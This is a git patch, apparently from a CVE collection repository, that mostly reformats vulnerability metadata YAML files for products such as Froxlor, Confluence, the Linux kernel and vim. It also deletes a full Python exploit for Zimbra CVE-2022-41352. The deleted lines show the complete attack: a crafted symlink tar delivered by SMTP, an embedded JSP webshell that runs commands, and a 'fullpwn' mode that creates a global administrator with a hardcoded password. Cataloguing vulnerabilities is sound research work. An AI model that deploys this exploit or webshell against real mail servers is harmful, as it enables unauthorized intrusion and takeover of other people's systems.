From bd0b5b8549046edfa0ede6fa61ef952996b5093b Mon Sep 17 00:00:00 2001 From: lastre3et Date: Tue, 9 May 2023 11:29:52 +0800 Subject: [PATCH 1/2] Update All Yaml Files Format --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 5 +- cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 5 +- cve/Froxlor/2023/yaml/CVE-2023-0877.yaml | 5 +- cve/Grafana/2021/yaml/CVE-2021-43798.yaml | 2 +- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 4 +- cve/Java-SE/2022/yaml/CVE-2022-21449.yaml | 4 +- cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 3 +- .../2022/CVE-2022-41352/cve-2022-41352.py | 236 ------------------ .../2022/yaml/CVE-2022-24112.yaml | 2 +- .../2022/yaml/CVE-2022-24706.yaml | 11 +- .../2019/yaml/CVE-2019-17564.yaml | 2 +- .../2021/yaml/CVE-2021-25641.yaml | 2 +- .../2021/yaml/CVE-2021-43297.yaml | 2 +- cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml | 3 +- .../2021/yaml/CVE-2021-41773.yaml | 2 +- .../2021/yaml/CVE-2021-42013.yaml | 4 +- .../2021/yaml/CVE-2021-26295.yaml | 1 - .../2022/yaml/CVE-2022-32532.yaml | 6 +- .../2017/yaml/CVE-2017-9805.yaml | 3 +- .../2018/yaml/CVE-2018-11776.yaml | 3 +- .../2019/yaml/CVE-2019-0230.yaml | 3 +- cve/apache-solr/2021/yaml/CVE-2021-27905.yaml | 11 +- .../2020/yaml/CVE-2020-13935.yaml | 2 +- .../2020/yaml/CVE-2020-1938.yaml | 2 +- .../2020/yaml/CVE-2020-9484.yaml | 2 +- .../2022/yaml/CVE-2022-29885.yaml | 2 +- .../2020/yaml/CVE-2020-13942.yaml | 3 +- cve/confluence/2019/yaml/CVE-2019-3394.yaml | 3 +- cve/confluence/2019/yaml/CVE-2019-3396.yaml | 4 +- cve/confluence/2021/yaml/CVE-2021-26084.yaml | 2 +- cve/confluence/2022/yaml/CVE-2022-26134.yaml | 2 +- cve/confluence/2022/yaml/CVE-2022-26138.yaml | 5 +- cve/django/2021/yaml/CVE-2021-31542.yaml | 3 +- cve/django/2022/yaml/CVE-2022-28346.yaml | 3 +- cve/django/2022/yaml/CVE-2022-34265.yaml | 3 +- .../2019/CVE-2019-16884/ReadMe.md | 0 .../2019/yaml/CVE-2019-16884.yaml | 10 +- cve/docker/2019/yaml/CVE-2019-5736.yaml | 4 +- cve/fortinac/2022/yaml/CVE-2022-39952.yaml | 2 +- cve/gitlab/2021/yaml/CVE-2021-22205.yaml | 2 +- cve/gitlab/2021/yaml/CVE-2021-22214.yaml | 2 +- cve/gitlab/2022/yaml/CVE-2022-1162.yaml | 2 +- .../2022/yaml/CVE-2022-22978.yaml | 5 +- cve/java-spring/2017/yaml/CVE-2017-8046.yaml | 5 +- cve/java-spring/2020/yaml/CVE-2020-5398.yaml | 5 +- cve/java-spring/2022/yaml/CVE-2022-22963.yaml | 3 +- cve/java-spring/2022/yaml/CVE-2022-22965.yaml | 3 +- cve/java-spring/2022/yaml/CVE-2022-31692.yaml | 3 +- cve/joomla/2023/yaml/CVE-2023-23752.yaml | 6 +- cve/libxml2/2020/yaml/CVE-2020-24977.yaml | 2 +- cve/libxml2/2021/yaml/CVE-2021-3517.yaml | 4 +- cve/libxml2/2021/yaml/CVE-2021-3518.yaml | 2 +- cve/libxml2/2021/yaml/CVE-2021-3537.yaml | 2 +- cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml | 30 +-- cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml | 30 +-- .../2019/yaml/CVE-2019-13272.yaml | 1 + .../2020/yaml/CVE-2020-12351.yaml | 2 +- .../2021/yaml/CVE-2021-22555.yaml | 8 +- .../2021/yaml/CVE-2021-26708.yaml | 4 +- .../2021/yaml/CVE-2021-29155.yaml | 2 +- .../2021/yaml/CVE-2021-33624.yaml | 6 +- .../2021/yaml/CVE-2021-33909.yaml | 4 +- cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml | 10 +- cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml | 2 + .../2021/yaml/CVE-2021-42008.yaml | 6 +- cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml | 8 +- .../2021/yaml/CVE-2021-42327.yaml | 6 +- cve/linux-kernel/2022/CVE-2022-2602/README.md | 6 - cve/linux-kernel/2022/CVE-2022-2602/poc.c | 174 ------------- cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml | 8 +- cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml | 3 +- cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml | 10 +- cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml | 2 +- cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml | 6 +- cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml | 10 +- cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml | 1 + .../2022/yaml/CVE-2022-23222.yaml | 4 +- .../2022/yaml/CVE-2022-24122.yaml | 2 +- .../2022/yaml/CVE-2022-25258.yaml | 3 +- .../2022/yaml/CVE-2022-25265.yaml | 6 +- .../2022/yaml/CVE-2022-25636.yaml | 6 +- cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml | 4 +- cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml | 6 +- cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml | 19 -- cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml | 62 ++--- .../2022/yaml/CVE-2022-27666.yaml | 7 +- .../2022/yaml/CVE-2022-32250.yaml | 6 +- .../2022/yaml/CVE-2022-34918.yaml | 2 +- ...VE-2022-36946.yaml => CVE-2022-36946.yaml} | 39 +-- .../2022/yaml/CVE-2022-41218.yaml | 4 +- cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml | 19 +- cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml | 6 +- cve/openssl/2016/yaml/CVE-2016-2107.yaml | 3 +- cve/openssl/2021/yaml/CVE-2021-3449.yaml | 3 +- cve/openssl/2022/yaml/CVE-2022-0778.yaml | 5 +- cve/openssl/2022/yaml/CVE-2022-2274.yaml | 2 +- cve/openssl/2022/yaml/CVE-2022-3602.yaml | 2 +- cve/openssl/2023/yaml/CVE-2023-25136.yaml | 2 +- cve/polkit/2021/yaml/CVE-2021-3560.yaml | 6 +- cve/polkit/2021/yaml/CVE-2021-4034.yaml | 4 +- cve/python/2022/yaml/CVE-2022-30286.yaml | 3 +- cve/python/2022/yaml/CVE-2022-35411.yaml | 3 +- cve/redis/2022/yaml/CVE-2022-0543.yaml | 5 +- cve/redis/2022/yaml/CVE-2022-31144.yaml | 3 +- cve/samba/2021/yaml/CVE-2021-44142.yaml | 5 +- cve/sudo/2021/yaml/CVE-2021-3156.yaml | 2 +- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 33 ++- cve/vim/2021/yaml/CVE-2021-3778.yaml | 3 +- cve/vim/2022/yaml/CVE-2022-0351.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0359.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0413.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-0417.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0572.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0629.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0685.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-0714.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0729.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-1771.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-2206.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-2257.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-2264.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-2598.yaml | 2 +- cve/vim/2023/yaml/CVE-2023-1127.yaml | 2 +- cve/webmin/2019/yaml/CVE-2019-12840.yaml | 2 +- cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 3 +- .../2022/yaml/KVE-2022-0231.yaml | 2 +- .../2022/yaml/KVE-2022-0206.yaml | 2 +- .../2022/yaml/KVE-2022-0207.yaml | 2 +- .../2022/yaml/KVE-2022-0210.yaml | 2 +- .../2022/yaml/KVE-2022-0205.yaml | 2 +- other_list.yaml | 1 - 131 files changed, 316 insertions(+), 781 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py rename cve/{linux-kernel => docker}/2019/CVE-2019-16884/ReadMe.md (100%) rename cve/{linux-kernel => docker}/2019/yaml/CVE-2019-16884.yaml (70%) delete mode 100644 cve/linux-kernel/2022/CVE-2022-2602/README.md delete mode 100644 cve/linux-kernel/2022/CVE-2022-2602/poc.c delete mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml rename cve/linux-kernel/2022/yaml/{ CVE-2022-36946.yaml => CVE-2022-36946.yaml} (86%) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 7cd4ff5e..6e50fa41 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,5 @@ id: CVE-2021-42325 -source: - https://www.exploit-db.com/exploits/50502 +source: https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -8,7 +7,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.9~0.10.30 + 0.9 < Froxlor < 0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml index 5823536a..1dca795a 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml @@ -1,13 +1,12 @@ id: CVE-2023-0315 -source: - https://github.com/mhaskar/CVE-2023-0315 +source: https://github.com/mhaskar/CVE-2023-0315 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high description: | Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。 scope-of-influence: - Froxlor 2.0.8 之前的版本 + Froxlor < 2.0.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0315 - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml index c65b99ea..792cb127 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml @@ -1,13 +1,12 @@ id: CVE-2023-0877 -source: - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ +source: https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high description: | Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11. scope-of-influence: - Froxlor before 2.0.8 + Froxlor < 2.0.8 reference: - https://github.com/blakduk/Advisories - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ diff --git a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml index 6580d144..79e07b15 100644 --- a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml +++ b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml @@ -10,7 +10,7 @@ info: reference: - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml index eaf35209..685d9c26 100644 --- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml @@ -4,9 +4,9 @@ info: name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 severity: critical description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB < 1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: diff --git a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml index b95ffd9b..1d218dd7 100644 --- a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml +++ b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml @@ -4,7 +4,9 @@ info: name: Java SE(Java Standard Edition,Java 标准版)是Java技术的核心和基础,是Java ME和Java EE编程的基础。Java SE是Java程序设计语言和Java平台的总称。 severity: high description: Oracle Java SE(组件:库)中存在漏洞。易被利用的漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而危害Oracle Java SE、Oracle GraalVM Enterprise Edition。成功攻击此漏洞会导致对关键数据或所有Oracle Java SE、Oracle GraalVM Enterprise Edition可访问数据进行未经授权的创建、删除或修改访问。 - scope-of-influence: Oracle Java SE:17.0.2和18;Oracle GraalVM企业版:21.3.1和22.0.0.2 + scope-of-influence: + Oracle Java SE:17.0.2和18 + Oracle GraalVM企业版:21.3.1和22.0.0.2 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449 - https://security.netapp.com/advisory/ntap-20220429-0006/ diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml index 4223ef65..b0147978 100644 --- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -1,6 +1,5 @@ id: CVE-2019-8942 -source: - https://github.com/synacktiv/CVE-2019-8942 +source: https://github.com/synacktiv/CVE-2019-8942 info: name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 severity: high diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py deleted file mode 100644 index d440f7e6..00000000 --- a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python3 - -import sys -import smtplib -import argparse -from time import sleep -from email.mime.multipart import MIMEMultipart -from email.mime.application import MIMEApplication -from email.mime.text import MIMEText -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -# CONFIGURATION -#---------------------------------- -TARGET = 'mail.test.org' -WEBSHELL_PATH = '/public/jsp' -WEBSHELL_NAME = 'Startup1_3.jsp' -ATTACHMENT = 'payload.tar' -SENDER = 'test@test.org' -RECIPIENT = 'admin@test.org' - -EMAIL_SUBJECT = 'CVE-2022-41352' -EMAIL_BODY = 'Just testing.

Don\'t mind me.

' -#---------------------------------- - -# Only change this if zimbra was not installed in the default location -UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' - - -def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): - # Block 1 - link = lnk.encode() - mode = b'0000777\x00' # link permissions - ouid = b'0001745\x00' # octal uid (997) - ogid = b'0001745\x00' # octal gid - lnsz = b'00000000000\x00' # file size (link = 0) - lmod = b'14227770134\x00' # last modified (octal unix) - csum = b' ' # checksum = 8 blanks - type = b'2' # type (link = 2) - targ = payload_path.encode() # link target - magi = b'ustar \x00' # ustar magic bytes + version - ownu = b'zimbra' # user owner - owng = b'zimbra' # group owner - vers = b'\x00'*8 + b'\x00'* 8 # device major and minor - pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) - - raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod - raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] - raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 - # pad block to 512 - raw_b1 += b'\00'*(512-len(raw_b1)) - - # Block 2 - mode = b'0000644\x00' # file permissions - file = f'{lnk}/{payload_name}'.encode() - flsz = oct(len(payload))[2:] # file size - csum = b' ' # checksum = 8 blanks - type = b'0' # type (file = 0) - targ = b'\x00'*100 # link target = none - - raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod - raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] - raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 - # pad block to 512 - raw_b2 += b'\00'*(512-len(raw_b2)) - - - # Assemble - raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) - raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks - - return raw_tar - -# Update this if you want to use a legit email account for sending the payload -def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): - msg = MIMEMultipart() - msg['Subject'] = subject - msg['From'] = sender - msg['To'] = recipient - - message = MIMEText(body, 'html') - msg.attach(message) - - att = MIMEApplication(attachment) - att.add_header('Content-Disposition', 'attachment', filename=attachment_name) - msg.attach(att) - - try: - print(f'>>> Sending payload') - smtp_server = smtplib.SMTP(target,25) - smtp_server.sendmail(sender, recipient, msg.as_string()) - print(f'>>> Payload delivered') - except Exception as e: - print(f'[!] Failed to send the mail: {e}') - sys.exit(1) - -def verify_upload(target, shell, path): - print(f'>>> Verifying upload to {path}/{shell} ...') - sleep(5) # give the server time to process the email - resp = requests.get(f'https://{target}{path}/{shell}', verify=False) - if resp.status_code == 200: - print(f'>>> [PWNED] Upload successful!') - else: - print(f'>>> Upload unsuccesful :(') - sys.exit(1) - -def create_new_zimbra_admin(target, shell, path): - url = f'https://{target}' - pw = 'Pwn1ng_Z1mbra_!s_fun' - print(f'>>> Adding a new global administrator') - if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'): - sys.exit(0) - admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) - - print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') - print(f'>>> Email : {admin}') - print(f'>>> Password : {pw}') - - -def main(args): - global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY - - # Kali JSP WebShell - payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' - - # Using this instead of argparse default values to allow easy manual configuration as well - if args.payload: - try: - with open(args.payload, 'rb') as f: - payload = f.read() - except Exception as e: - print(f'Failed to read {args.payload}: {e}') - sys.exit(1) - print(f'>>> Using custom payload from: {args.payload}') - else: - print(f'>>> Using default payload: JSP Webshell') - if args.path: - WEBSHELL_PATH = args.path - if args.file: - WEBSHELL_NAME = args.file - if args.attach: - ATTACHMENT = args.attach - - tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) - - print(f'>>> Assembled payload attachment: {ATTACHMENT}') - print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'manual': - with open(ATTACHMENT, 'wb') as f: - f.write(tar) - print(f'>>> Attachment saved locally.') - sys.exit(0) - - if args.target: - TARGET = args.target - - print(f'>>> Targeting {TARGET}') - - if args.sender: - SENDER = args.sender - if args.recip: - RECIPIENT = args.recip - if args.subject: - EMAIL_SUBJECT = args.subject - if args.body: - try: - with open(args.body, 'rb') as f: - EMAIL_BODY = f.read().decode() - except Exception as e: - print(f'Failed to read {args.body}: {e}') - sys.exit(1) - print(f'>>> Using custom email body from: {args.body}') - - - smtp_send_file( TARGET, - SENDER, - RECIPIENT, - EMAIL_SUBJECT, - EMAIL_BODY, - tar, - ATTACHMENT ) - - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - - verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'auto': - sys.exit(0) - - if args.payload: - print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account') - else: - create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - sys.exit(0) - -if __name__ == '__main__': - epi = ''' -Alternatively, edit the script to change the default configuration. - -The available modes are: - - manual : Only create the payload - you have to deploy the payload yourself. - auto : Create a webshell and deploy it via SMTP. - fullpwn : After deploying a webshell, add a new global mail administrator. -''' - - p = argparse.ArgumentParser( - description = 'CVE-2022-41352 Zimbra RCE', - formatter_class = argparse.RawDescriptionHelpFormatter, - epilog = epi - ) - p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') - - p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') - p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') - p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') - p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') - p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') - p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') - p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') - p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') - p.add_argument('--body', required=False, metavar='', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")') - - args = p.parse_args() - - main(args) diff --git a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml index 883d103f..a70bb457 100644 --- a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml +++ b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml @@ -11,7 +11,7 @@ info: - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 cnvd-id: None diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml index 50fd5093..f1346b55 100644 --- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml +++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml @@ -8,8 +8,8 @@ info: scope-of-influence: apache-CouchDB < 3.2.2 reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code-Execution.html - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 - http://www.openwall.com/lists/oss-security/2022/05/09/2 @@ -17,7 +17,7 @@ info: - http://www.openwall.com/lists/oss-security/2022/05/09/4 - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd - https://www.openwall.com/lists/oss-security/2022/04/26/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -26,7 +26,4 @@ info: cwe-id: CWE-1188 cnvd-id: None kve-id: None - tags: - - 不安全的默认资源初始化 - - 弱口令要求 - - 远程代码执行 \ No newline at end of file + tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行 \ No newline at end of file diff --git a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml index 2ae19468..f467401d 100644 --- a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml +++ b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml @@ -12,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-17564 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17564 cwe-id: CWE-502 diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml index faf28d8b..2a64f8c3 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml @@ -11,7 +11,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-25641 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25641 cwe-id: CWE-502 diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml index 1ba752b3..dacaa277 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml @@ -11,7 +11,7 @@ info: - https://help.aliyun.com/document_detail/390193.html - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-43297 cwe-id: CWE-502 diff --git a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml index 84888dbf..5908596e 100644 --- a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml +++ b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml @@ -8,11 +8,10 @@ info: description: | Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。 scope-of-influence: - Apache HTTP = 2.4.20-2.4.43 + 2.4.20 ≤ Apache HTTP ≤ 2.4.43 reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490 - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml index 48a8205e..0fd3ca93 100644 --- a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - 